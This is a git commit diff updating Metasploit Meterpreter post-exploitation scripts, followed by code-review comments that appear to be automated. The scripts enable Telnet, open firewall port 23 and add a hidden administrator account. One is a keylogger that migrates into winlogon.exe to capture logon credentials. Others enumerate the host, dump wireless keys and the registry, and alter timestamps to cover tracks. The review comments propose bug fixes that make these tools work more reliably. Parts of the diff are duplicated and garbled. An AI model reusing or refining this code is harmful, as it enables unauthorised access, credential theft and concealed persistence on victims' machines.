Updated meterpreter scripts from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6386 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
73e946ccf1
commit
02ab203dfd
|
@ -1,201 +1,212 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.2
|
||||
#Note: If the Telnet Server is not installed in Vista or win2k8
|
||||
# it will be installed.
|
||||
################## Variable Declarations ##################
|
||||
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-e" => [ false, "Enable Telnet Server only." ],
|
||||
"-p" => [ true, "The Password of the user to add." ],
|
||||
"-u" => [ true, "The Username of the user to add." ]
|
||||
)
|
||||
def checkifinst(session)
|
||||
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ (/TlntSvr/)
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def insttlntsrv(session)
|
||||
trgtos = winver(session)
|
||||
# it will be installed.
|
||||
################## Variable Declarations ##################
|
||||
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-e" => [ false, "Enable Telnet Server only." ],
|
||||
"-p" => [ true, "The Password of the user to add." ],
|
||||
"-u" => [ true, "The Username of the user to add." ]
|
||||
)
|
||||
def checkifinst(session)
|
||||
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ (/TlntSvr/)
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def insttlntsrv(session)
|
||||
trgtos = winver(session)
|
||||
if trgtos =~ /(Windows Vista)/
|
||||
if checkifinst(session)
|
||||
print_status("Telnet Service Installed on Target")
|
||||
else
|
||||
print_status("Installing Telnet Server Service ......")
|
||||
session.response_timeout=90
|
||||
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
else
|
||||
print "[*] Installing Telnet Server Service ......")
|
||||
session.response_timeout=90
|
||||
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
sleep(2)
|
||||
prog2check = "pkgmgr.exe"
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
print "."
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def enabletlntsrv(session)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
||||
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
||||
value2 = "Start"
|
||||
begin
|
||||
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
||||
v2 = open_key.query_value(value2)
|
||||
print_status "Setting Telnet Server Services service startup mode"
|
||||
if v2.data != 2
|
||||
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
||||
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
||||
cmmds. each do |cmd|
|
||||
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
else
|
||||
print_status "\tTelnet Server Services service is already set to auto"
|
||||
end
|
||||
#Enabling Exception on the Firewall
|
||||
print_status "\tOpening port in local firewall if necessary"
|
||||
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def addrdpusr(session, username, password)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
print_status "Setting user account for logon"
|
||||
print_status "\tAdding User: #{username} with Password: #{password}"
|
||||
begin
|
||||
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group TelnetClients"
|
||||
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group Administrators"
|
||||
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "You can now login with the created user"
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def message
|
||||
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status("Finnished installing the Telnet Service.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def enabletlntsrv(session)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
||||
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
||||
value2 = "Start"
|
||||
begin
|
||||
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
||||
v2 = open_key.query_value(value2)
|
||||
print_status "Setting Telnet Server Services service startup mode"
|
||||
if v2.data != 2
|
||||
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
||||
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
||||
cmmds. each do |cmd|
|
||||
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
else
|
||||
print_status "\tTelnet Server Services service is already set to auto"
|
||||
end
|
||||
#Enabling Exception on the Firewall
|
||||
print_status "\tOpening port in local firewall if necessary"
|
||||
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def addrdpusr(session, username, password)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
print_status "Setting user account for logon"
|
||||
print_status "\tAdding User: #{username} with Password: #{password}"
|
||||
begin
|
||||
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group TelnetClients"
|
||||
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group Administrators"
|
||||
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "You can now login with the created user"
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def message
|
||||
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
||||
end
|
||||
def usage
|
||||
print(
|
||||
"Windows Telnet Server Enabler Meterpreter Script\n" +
|
||||
"Usage: getgui -u <username> -p <password> \n" +
|
||||
@@exec_opts.usage
|
||||
print(
|
||||
"Windows Telnet Server Enabler Meterpreter Script\n" +
|
||||
"Usage: getgui -u <username> -p <password> \n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
end
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
usr = nil
|
||||
pass = nil
|
||||
lport = nil
|
||||
enbl = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-u"
|
||||
usr = val
|
||||
when "-p"
|
||||
pass = val
|
||||
when "-h"
|
||||
usage
|
||||
break
|
||||
when "-n"
|
||||
lport = val.to_i
|
||||
when "-e"
|
||||
enbl = 1
|
||||
end
|
||||
|
||||
}
|
||||
if enbl == 1
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
|
||||
elsif usr!= nil && pass != nil
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
addrdpusr(session, usr, pass)
|
||||
|
||||
else
|
||||
usage
|
||||
end
|
||||
|
||||
end
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
usr = nil
|
||||
pass = nil
|
||||
lport = nil
|
||||
enbl = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-u"
|
||||
usr = val
|
||||
when "-p"
|
||||
pass = val
|
||||
when "-h"
|
||||
usage
|
||||
break
|
||||
when "-n"
|
||||
lport = val.to_i
|
||||
when "-e"
|
||||
enbl = 1
|
||||
end
|
||||
|
||||
}
|
||||
if enbl == 1
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
|
||||
elsif usr!= nil && pass != nil
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
addrdpusr(session, usr, pass)
|
||||
|
||||
else
|
||||
usage
|
||||
end
|
||||
|
||||
|
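Review bot: In the new `insttlntsrv`, the install branch appends the pkgmgr output with `tmpout << d` but `tmpout` is never assigned in this method (the `tmpout = [ ]` declarations belong to `enabletlntsrv` and `addrdpusr`), so the first chunk read from the channel raises NameError instead of completing the install; add `tmpout = []` at the top of the method, or, since the output is discarded, drain the channel with an empty loop body. `checkifinst` returns from inside the read loop, so a positive match never reaches `r.channel.close`/`r.close` and leaks the process handle, while a negative result falls through to whatever `r.close` returns rather than an explicit `false`; record the match in a local, close, then return it. `session.response_timeout=90` is raised for the install and never restored, so the longer timeout applies to every later call on this session. Which of the two duplicated copies shown is the old side is not fully recoverable from this rendering; these remarks assume the `checkifinst`-based branch is the new code.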
|
|
@ -34,21 +34,15 @@ captype = 0
|
|||
"-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0."]
|
||||
|
||||
)
|
||||
|
||||
#Function to Migrate in to Explorer process to be able to interact with desktop
|
||||
def explrmigrate(session,captype)
|
||||
def explrmigrate(session,captype,adm)
|
||||
begin
|
||||
print_status("Migrating process...")
|
||||
if captype.to_i == 0
|
||||
process2mig = "explorer.exe"
|
||||
elsif captype.to_i == 1
|
||||
# Check to make sure that process is running and system to be able to migrate to high priv process
|
||||
if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
|
||||
process2mig = "winlogon.exe"
|
||||
else
|
||||
print_status("\tYou are not currently running as System to be able to migrate to winlogon.")
|
||||
print_status("\tCapturing only logon user keystrokes.")
|
||||
process2mig = "explorer.exe"
|
||||
end
|
||||
process2mig = "winlogon.exe"
|
||||
else
|
||||
process2mig = "explorer.exe"
|
||||
end
|
||||
|
@ -70,8 +64,10 @@ end
|
|||
#Function for starting the keylogger
|
||||
def startkeylogger(session)
|
||||
begin
|
||||
print_status("Grabbing Desktop Keyboard Input...")
|
||||
session.ui.grab_desktop
|
||||
print_status("Starting the keystroke sniffer...")
|
||||
client.ui.keyscan_start
|
||||
session.ui.keyscan_start
|
||||
return true
|
||||
rescue
|
||||
print_status("Failed to start Keylogging!")
|
||||
|
@ -125,8 +121,11 @@ def keycap(session, keytime, logfile)
|
|||
end
|
||||
db.close
|
||||
rescue::Exception => e
|
||||
print("\n")
|
||||
print_status("#{e.class} #{e}")
|
||||
db.close
|
||||
print_status("Error: #{e.class} #{e}")
|
||||
print_status("Stopping keystroke sniffer...")
|
||||
session.ui.keyscan_stop
|
||||
end
|
||||
end
|
||||
def helpmsg
|
||||
|
@ -155,7 +154,8 @@ helpcall = 0
|
|||
|
||||
}
|
||||
if helpcall == 0
|
||||
if explrmigrate(session,captype)
|
||||
adm = checkifadm(session)
|
||||
if explrmigrate(session,captype,adm)
|
||||
if startkeylogger(session)
|
||||
keycap(session, keytime, logfile)
|
||||
end
|
||||
|
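Review bot: The new `explrmigrate(session,captype,adm)` signature takes `adm` but no line of the hunk reads it: the `captype.to_i == 1` branch now assigns `process2mig = "winlogon.exe"` unconditionally, where the removed lines consulted `session.sys.config.getuid` and fell back to `explorer.exe` with an explanatory `print_status`. If `adm = checkifadm(session)` in the main block (hunk at -155,7) is meant to replace that guard, the branch should use it, e.g. `process2mig = adm ? "winlogon.exe" : "explorer.exe"`; otherwise the parameter should go. The remainder of `explrmigrate` lies outside the hunk, so a use of `adm` further down cannot be ruled out from this view. In the `keycap` hunk (-125,8), the added `db.close` inside the `rescue` clause raises again if `db` was never assigned or if the original exception came from the body's own `db.close`, and that second exception skips `session.ui.keyscan_stop`; moving `db.close` into an `ensure` clause covers both paths.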
|
|
@ -3,7 +3,7 @@
|
|||
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
|
||||
# and Windows XP remote targets using native windows command wmic.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Verion: 0.1.0
|
||||
#Note:
|
||||
################## Variable Declarations ##################
|
||||
session = client
|
||||
|
@ -39,10 +39,17 @@ wmic = [
|
|||
'group list',
|
||||
'sysaccount list',
|
||||
'volume list brief',
|
||||
'logicaldisk get description,filesystem,name,size',
|
||||
'netlogin get name,lastlogon,badpasswordcount',
|
||||
'netclient list brief',
|
||||
'netuse get name,username,connectiontype,localname',
|
||||
'share get name,path',
|
||||
'nteventlog get path,filename,writeable',
|
||||
'service list brief',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'product get name,version',
|
||||
'qfe list'
|
||||
]
|
||||
################## Function Declarations ##################
|
||||
|
@ -75,7 +82,19 @@ def wmicexec(session,wmic,user,pass,trgt)
|
|||
sleep(1)
|
||||
#print_status "\twmic #{command}"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
#Making sure that wmic finnishes before executing next wmic command
|
||||
prog2check = "wmic.exe"
|
||||
found = 0
|
||||
sleep(2)
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
end
|
||||
# Read the output file of the wmic commands
|
||||
|
@ -122,6 +141,9 @@ end
|
|||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
|
||||
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
|
@ -133,7 +155,19 @@ def winver(session)
|
|||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
# Read the output file of the wmic commands
|
||||
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ /Windows Serverr 2008/
|
||||
version = "Windows 2008"
|
||||
elsif d =~ /Windows Vista/
|
||||
version = "Windows Vista"
|
||||
end
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
|
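Review bot: In the new `winver` branch for major version 6 (hunk -133,7), the handle returned by the `wmic /append:#{wmitmptxt} os get name` execute is assigned to `r` and then overwritten by the `type #{wmitmptxt}` execute without an `r.close`, so that process handle is leaked on every call. The fixed `sleep(2)` between the two is the only synchronisation, so on a slow host `type` can read an empty or partial file and `version` silently stays at `"Windows Vista/Windows 2008"`; the `wmicexec` hunk above (-75,7) already polls `get_processes()` for `wmic.exe`, and the same wait belongs here before the read. That polling loop itself matches any process named `wmic.exe` and has no iteration bound, so comparing `x['pid']` with `r.pid` and capping the retries would make both waits reliable. `winver` starts above this hunk, so the declaration of `wmitmptxt` (shown in hunk -122,6) is the only part of its setup visible here.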
|
|
@ -1,20 +1,21 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
|
||||
# and Windows XP targets using native windows commands.
|
||||
#Windows 7 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.3.4
|
||||
#Verion: 0.3.5
|
||||
#Note: Compleatly re-writen to make it modular and better error handling.
|
||||
# Working on adding more Virtual Machine Checks and looking at improving
|
||||
# the code but retain the independance of each module so it is easier for
|
||||
# the code to be re-used.
|
||||
#Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions)
|
||||
# inquis (bernardo.damele 0x40 gmail 0x2E com) (Minor Fixes)
|
||||
################## Variable Declarations ##################
|
||||
session = client
|
||||
host,port = session.tunnel_peer.split(':')
|
||||
|
||||
# Create Filename info to be appended to downloaded files
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000))
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
|
||||
|
||||
# Create a directory for the logs
|
||||
logs = ::File.join(Msf::Config.config_directory, 'logs', 'winenum', host + filenameinfo )
|
||||
|
@ -47,8 +48,12 @@ commands = [
|
|||
'net group administrators',
|
||||
'net view /domain',
|
||||
'netsh firewall show config',
|
||||
'tasklist /svc'
|
||||
|
||||
'tasklist /svc',
|
||||
'tasklist /m'
|
||||
]
|
||||
# Windows 2008 Commands
|
||||
win2k8cmd = [
|
||||
'oclist',
|
||||
]
|
||||
# Commands wich MACE will be changed
|
||||
cmdstomp = [
|
||||
|
@ -65,14 +70,21 @@ cmdstomp = [
|
|||
]
|
||||
# WMIC Commands that will be executed on the Target
|
||||
wmic = [
|
||||
'computersystem list',
|
||||
'computersystem list brief',
|
||||
'useraccount list',
|
||||
'group list',
|
||||
'service list brief',
|
||||
'volume list brief',
|
||||
'logicaldisk get description,filesystem,name,size',
|
||||
'netlogin get name,lastlogon,badpasswordcount',
|
||||
'netclient list brief',
|
||||
'netuse get name,username,connectiontype,localname',
|
||||
'share get name,path',
|
||||
'nteventlog get path,filename,writeable',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'product get name,version',
|
||||
'qfe',
|
||||
]
|
||||
#Specific Commands for Windows vista for Wireless Enumeration
|
||||
|
@ -184,7 +196,7 @@ def wmicexec(session,wmiccmds= nil)
|
|||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmicfl = tmp + "\\wmictmp.txt"
|
||||
wmiccmds.each do |wmi|
|
||||
print_status "\trunning command wimic #{wmi}"
|
||||
print_status "\trunning command wmic #{wmi}"
|
||||
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
|
@ -193,6 +205,18 @@ def wmicexec(session,wmiccmds= nil)
|
|||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
#Making sure that wmic finnishes before executing next wmic command
|
||||
prog2check = "wmic.exe"
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
end
|
||||
# Read the output file of the wmic commands
|
||||
|
@ -364,6 +388,22 @@ def regdump(session,pathoflogs,filename)
|
|||
session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
|
||||
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for extracting program list from registry
|
||||
def findprogs(session)
|
||||
print_status("Extracting software list from registry")
|
||||
proglist = ""
|
||||
session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company|
|
||||
proglist << "#{company}"
|
||||
|
||||
session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software|
|
||||
proglist << "\t#{software}"
|
||||
end
|
||||
end
|
||||
print_status("Finnished Extraction of software list from registry")
|
||||
proglist
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function that will call 2 other Functions to cover all tracks
|
||||
def covertracks(session,cmdstomp)
|
||||
|
@ -504,6 +544,9 @@ end
|
|||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
|
||||
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
|
@ -515,9 +558,21 @@ def winver(session)
|
|||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
# Read the output file of the wmic commands
|
||||
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ /Windows Serverr 2008/
|
||||
version = "Windows 2008"
|
||||
elsif d =~ /Windows Vista/
|
||||
version = "Windows Vista"
|
||||
end
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
version = "Windows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
|
@ -588,13 +643,20 @@ if helpopt != 1
|
|||
if trgtos =~ /(Windows XP)/
|
||||
filewrt(dest,list_exec(session,commands))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
filewrt(dest,findprogs(session))
|
||||
dumpwlankeys(session,logs,filenameinfo)
|
||||
elsif trgtos =~ /(Windows .NET Server)/
|
||||
elsif trgtos =~ /(Windows 2003)/
|
||||
filewrt(dest,list_exec(session,commands))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
filewrt(dest,findprogs(session))
|
||||
elsif trgtos =~ /(Windows Vista)/
|
||||
filewrt(dest,list_exec(session,commands + vstwlancmd))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
filewrt(dest,findprogs(session))
|
||||
elsif trgtos =~ /(Windows 7)/
|
||||
filewrt(dest,list_exec(session,commands + vstwlancmd))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
dumpwlankeys(session,logs,filenameinfo)
|
||||
dumpwlankeys(session,logs,filenameinfo)
|
||||
elsif trgtos =~ /(Windows 2000)/
|
||||
filewrt(dest,list_exec(session,commands - nonwin2kcmd))
|
||||
|
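Review bot: The new `findprogs` enumerates the registry with `session.sys.registry.create_key(HKEY_CURRENT_USER, ...)`, which opens with write access and creates the key when it is absent, although the function only reads; the read-only form already used by these scripts, `open_key(root, base, KEY_READ)`, is the right call for both loops. The entries are appended as `proglist << "#{company}"` and `proglist << "\t#{software}"` with no line terminator, so everything `filewrt` later writes for this section lands on a single line; `proglist << "#{company}\n"` and `proglist << "\t#{software}\n"` fix that. In the main hunk (-588,13) the new `Windows 7` branch is the only one that runs `list_exec` and `wmicexec` without the matching `filewrt(dest,findprogs(session))`, which looks like an omission given the other three branches.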
|